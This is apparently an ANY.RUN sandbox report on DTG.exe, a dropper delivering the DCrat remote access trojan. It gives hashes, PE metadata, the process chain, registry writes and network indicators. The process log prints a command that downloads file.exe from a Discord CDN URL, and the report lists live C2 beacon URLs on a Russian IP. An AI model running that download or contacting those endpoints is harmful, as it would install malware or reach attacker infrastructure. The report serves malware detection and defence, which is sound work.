analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DTG.exe

Full analysis: https://app.any.run/tasks/eb0e4dd3-161c-447a-92bb-e215f1b861b2
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Malware Trends Tracker     >>>
Analysis date: November 29, 2020, 19:14:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
trojan
rat
backdoor
dcrat
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (console) Intel 80386, for MS Windows
MD5:

2202DF2D04172620A865284C25468C40

SHA1:

24514BDBB2745C465AD9C33B1D54283DB5491EEC

SHA256:

9C1933510DB0DBB9FF278BA0E636073BBFF613040BE71AE3CA3DF0194C946011

SSDEEP:

6144:j5aWbksiNTBOmOBUfLXwNvkJqEeWFiUxmgsDj/vuWqzS8GI2RR:j5atNTAmOBSXwNkJTokmgsHHuWqO8D23

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • extd.exe (PID: 1892)
      • extd.exe (PID: 2028)
      • file.exe (PID: 376)
      • ZBBZyltbXV8x7QWBSaxb.exe (PID: 2512)
      • intomonitor.exe (PID: 956)
      • IMEDICTUPDATE.exe (PID: 1004)

    • Drops executable file immediately after starts

      • file.exe (PID: 376)
      • ZBBZyltbXV8x7QWBSaxb.exe (PID: 2512)

    • Uses Task Scheduler to run other applications

      • intomonitor.exe (PID: 956)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2452)
      • schtasks.exe (PID: 960)
      • schtasks.exe (PID: 704)

    • DCRAT was detected

      • IMEDICTUPDATE.exe (PID: 1004)

    • Connects to CnC server

      • IMEDICTUPDATE.exe (PID: 1004)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • DTG.exe (PID: 2312)
      • WScript.exe (PID: 2084)
      • WScript.exe (PID: 732)

    • Drops a file that was compiled in debug mode

      • extd.exe (PID: 1892)
      • cmd.exe (PID: 3928)
      • file.exe (PID: 376)

    • Executable content was dropped or overwritten

      • DTG.exe (PID: 2312)
      • extd.exe (PID: 1892)
      • cmd.exe (PID: 3928)
      • file.exe (PID: 376)
      • ZBBZyltbXV8x7QWBSaxb.exe (PID: 2512)
      • intomonitor.exe (PID: 956)

    • Executes scripts

      • file.exe (PID: 376)
      • ZBBZyltbXV8x7QWBSaxb.exe (PID: 2512)

    • Drops a file with a compile date too recent

      • ZBBZyltbXV8x7QWBSaxb.exe (PID: 2512)
      • intomonitor.exe (PID: 956)

    • Creates files in the program directory

      • intomonitor.exe (PID: 956)

    • Starts itself from another location

      • intomonitor.exe (PID: 956)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (41)
.exe | Win64 Executable (generic) (36.3)
.dll | Win32 Dynamic Link Library (generic) (8.6)
.exe | Win32 Executable (generic) (5.9)
.exe | Win16/32 Executable Delphi generic (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:02:01 21:18:05+01:00
PEType: PE32
LinkerVersion: 2.5
CodeSize: 70144
InitializedDataSize: 285184
UninitializedDataSize: -
EntryPoint: 0x1000
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows command line

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_CUI
Compilation Date: 01-Feb-2018 20:18:05

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 5
Time date stamp: 01-Feb-2018 20:18:05
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.code
0x00001000
0x0000387E
0x00003A00
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
5.52797
.text
0x00005000
0x0000D642
0x0000D800
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.54615
.rdata
0x00013000
0x000033A8
0x00003400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
7.11033
.data
0x00017000
0x0000178C
0x00001200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
5.10093
.rsrc
0x00019000
0x00041400
0x00041400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
7.99849

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.92322
611
Latin 1 / Western European
UNKNOWN
RT_MANIFEST
37CC762889D89ED82B0F8082A787488D8B52E439
2.58496
6
Latin 1 / Western European
UNKNOWN
RT_RCDATA
8107AD4234DBDB426EEC4E3586EF4342434CDF41
5.64022
60
Latin 1 / Western European
UNKNOWN
RT_RCDATA
96BBCF029C0AF068638AFC587F789E0BE99E822F
7.99928
265216
Latin 1 / Western European
UNKNOWN
RT_RCDATA
BB566DB6B3319380E8F5ADC2C374C570
3.23593
14
Latin 1 / Western European
UNKNOWN
RT_RCDATA
E17710310A95EDFDDFE85FA8E27B3996AE7CD060
6.84502
174
Latin 1 / Western European
UNKNOWN
RT_RCDATA
F2C9BF06DC
0
1
Latin 1 / Western European
UNKNOWN
RT_RCDATA
F6FC11950B9994DF94408CA6FCCFB624
7.10232
240
Latin 1 / Western European
UNKNOWN
RT_RCDATA

Imports

COMCTL32.DLL
GDI32.DLL
KERNEL32.dll
MSVCRT.dll
OLE32.DLL
SHELL32.DLL
SHLWAPI.DLL
USER32.DLL
WINMM.DLL
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
15
Malicious processes
8
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start dtg.exe cmd.exe extd.exe file.exe extd.exe no specs wscript.exe no specs cmd.exe no specs zbbzyltbxv8x7qwbsaxb.exe wscript.exe no specs cmd.exe no specs intomonitor.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs #DCRAT imedictupdate.exe

Process information

PID
CMD
Path
Indicators
Parent process
2312"C:\Users\admin\AppData\Local\Temp\DTG.exe" C:\Users\admin\AppData\Local\Temp\DTG.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3928"C:\Windows\system32\cmd" /c "C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\776C.bat C:\Users\admin\AppData\Local\Temp\DTG.exe"C:\Windows\system32\cmd.exe
DTG.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1892C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/781961547324063799/782685559528882216/file.exe" "file.exe" "" "" "" "" "" "" C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
376file.exe C:\Users\admin\AppData\Local\Temp\18133\file.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2028C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe "" "" "" "" "" "" "" "" "" C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2084"C:\Windows\System32\WScript.exe" "C:\fontwin\kvJ4bXdZaMAubDuToPWQkvZAJ3aT3u.vbe" C:\Windows\System32\WScript.exefile.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1760cmd /c ""C:\fontwin\S6zcPlhbe4N8j5sbAT8oa6BArAd5HN.bat" "C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2512ZBBZyltbXV8x7QWBSaxb.exe -p05dfc7f67816f98eb3a762f823599b3a58c6c582C:\fontwin\ZBBZyltbXV8x7QWBSaxb.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
732"C:\Windows\System32\WScript.exe" "C:\fontwin\N4epcgQecAnjyygw8SG45FKiobRBj4.vbe" C:\Windows\System32\WScript.exeZBBZyltbXV8x7QWBSaxb.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1108cmd /c ""C:\fontwin\uuvtFWrWhfSvv75Tqpu9K4c9X9ZOi7.bat" "C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
314
Read events
285
Write events
29
Delete events
0

Modification events

(PID) Process:(376) file.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(376) file.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2084) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2084) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2512) ZBBZyltbXV8x7QWBSaxb.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2512) ZBBZyltbXV8x7QWBSaxb.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(732) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(732) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(956) intomonitor.exeKey:HKEY_CURRENT_USER\Software\85ea072a9e5a5bbfb99441627ffd39601d90bbdd
Operation:writeName:0107c07d5c5a9e83a2c81dca62131af7ba08ed5b
Value:
PCQ+QzpcUHJvZ3JhbURhdGFcQXBwbGljYXRpb24gRGF0YVxzbXNzLmV4ZTwkPkM6XGZvbnR3aW5cY3Nyc3MuZXhlPCQ+QzpcVXNlcnNcYWRtaW5cRG9jdW1lbnRzXE15IE11c2ljXElNRURJQ1RVUERBVEUuZXhl
(PID) Process:(1004) IMEDICTUPDATE.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IMEDICTUPDATE_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
8
Suspicious files
0
Text files
6
Unknown types
2

Dropped files

PID
Process
Filename
Type
3928cmd.exeC:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\777D.tmp
MD5:
SHA256:
2512ZBBZyltbXV8x7QWBSaxb.exeC:\fontwin\N4epcgQecAnjyygw8SG45FKiobRBj4.vbevbe
MD5:F17F0E353FF2E0748C45D184FCEF0F6D
SHA256:39A04084B03EED5307597DB5CA334E120D65E30753B26B6B04B2125F2E183D7F
2512ZBBZyltbXV8x7QWBSaxb.exeC:\fontwin\uuvtFWrWhfSvv75Tqpu9K4c9X9ZOi7.battext
MD5:F53F2D3486BCADFEBF99B50787D63EF8
SHA256:B280C295172C0BF15D05D01E68177D89780B3C16B6C1FB54BA137DE6E084426F
2312DTG.exeC:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\776C.battext
MD5:71E858EEF1A50FBB9EDCD47FAAD181A2
SHA256:37BDCDA9090CDBA6C74B870121D1764BC2355B0DE8DF5BEE8E8998287084B948
376file.exeC:\fontwin\S6zcPlhbe4N8j5sbAT8oa6BArAd5HN.battext
MD5:9E93AC61E632B5701EDCE91203A1D3B1
SHA256:D0BDB40BE60214CEAFE39813BB98FA729887CA5BC23D966DEAC3F33C6CEA36AA
1892extd.exeC:\Users\admin\AppData\Local\Temp\file.exeexecutable
MD5:78843008C87987BA38BDC904B2D0AA6B
SHA256:A3768890FC31193053B505A954378E3C936F257D8ECB86F47037CBA861B81969
956intomonitor.exeC:\ProgramData\69ddcba757bf72f7d36c464c71f42baab150b2b9text
MD5:1F0B918E693269B3FF4C2745BA1D6515
SHA256:1488D24D2740ACD5070A6C05FBDCEC751F47B9FD0C36ED755070CDB97441E911
956intomonitor.exeC:\fontwin\886983d96e3d3e31032c679b2d4ea91b6c05afeftext
MD5:9E2A65D4ED11D45BE5069F45C71A9064
SHA256:6879613416461C05A7E53DD678CD51B3E15D3EB8BB7F846837BDAB951B8B3FF0
2512ZBBZyltbXV8x7QWBSaxb.exeC:\fontwin\intomonitor.exeexecutable
MD5:CF169BD95835AE629C02622DAAC7A047
SHA256:5F452C934A5C0E7558FE7F0592E93E2A21A7DEE08E3A334AC98502C5E1A082E7
376file.exeC:\fontwin\ZBBZyltbXV8x7QWBSaxb.exeexecutable
MD5:2AD38CA67FC0883303D9FC98F6939EF5
SHA256:87E96FDFD3674E5487425A6169CBC11613F8E3B2C5AEBDF7BCFFCE8ABF61D2A5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
151.139.128.14:80
http://ocsp.comodoca4.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTOpjOEf6LG1z52jqAxwDlTxoaOCgQUQAlhZ%2FC8g3FP3hIILG%2FU1Ct2PZYCEQD5g7jF84adhvw3B5kCUueb
US
der
280 b
whitelisted
GET
200
151.139.128.14:80
http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrJdiQ%2Ficg9B19asFe73bPYs%2BreAQUdXGnGUgZvJ2d6kFH35TESHeZ03kCEFslzmkHxCZVZtM5DJmpVK0%3D
US
der
313 b
whitelisted
GET
200
151.139.128.14:80
http://crl.comodoca.com/AAACertificateServices.crl
US
der
506 b
whitelisted
1004
IMEDICTUPDATE.exe
GET
200
212.109.216.114:80
http://212.109.216.114/wmu7nzj48bdc5sfsivxxqwbhwvytre7ez/ramh92gnmgzspukfiow6z3w4k0syktrjibaovdmcgqze53rv3d1h85hs16t5jnjdcbefq1qi76n4poo8cf/dcbb3f0abca3117648fdcab13b68e1162ddbc275.php?Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH&8e9835d38dff946e24408bfe4ab24496=d3981f3ee160cf75a0df452d812fb5e4&Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH
RU
text
71 b
malicious
1004
IMEDICTUPDATE.exe
GET
200
212.109.216.114:80
http://212.109.216.114/wmu7nzj48bdc5sfsivxxqwbhwvytre7ez/ramh92gnmgzspukfiow6z3w4k0syktrjibaovdmcgqze53rv3d1h85hs16t5jnjdcbefq1qi76n4poo8cf/dcbb3f0abca3117648fdcab13b68e1162ddbc275.php?Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH&b5734a889a7eac7932861e019fed7999=2c673e0ac932abf7a843ea57933688a6&ca43f36379411f81492585e899d11eea=afbddd404b6e908834ec01647b97c946c53a6d64&Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH
RU
text
150 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1004
IMEDICTUPDATE.exe
212.109.216.114:80
JSC ISPsystem
RU
malicious
1892
extd.exe
162.159.134.233:443
cdn.discordapp.com
Cloudflare Inc
shared
151.139.128.14:80
crl.comodoca.com
Highwinds Network Group, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
cdn.discordapp.com
  • 162.159.134.233
  • 162.159.135.233
  • 162.159.133.233
  • 162.159.129.233
  • 162.159.130.233
shared
crl.comodoca.com
  • 151.139.128.14
whitelisted
ocsp.comodoca4.com
  • 151.139.128.14
whitelisted

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
DTG.exe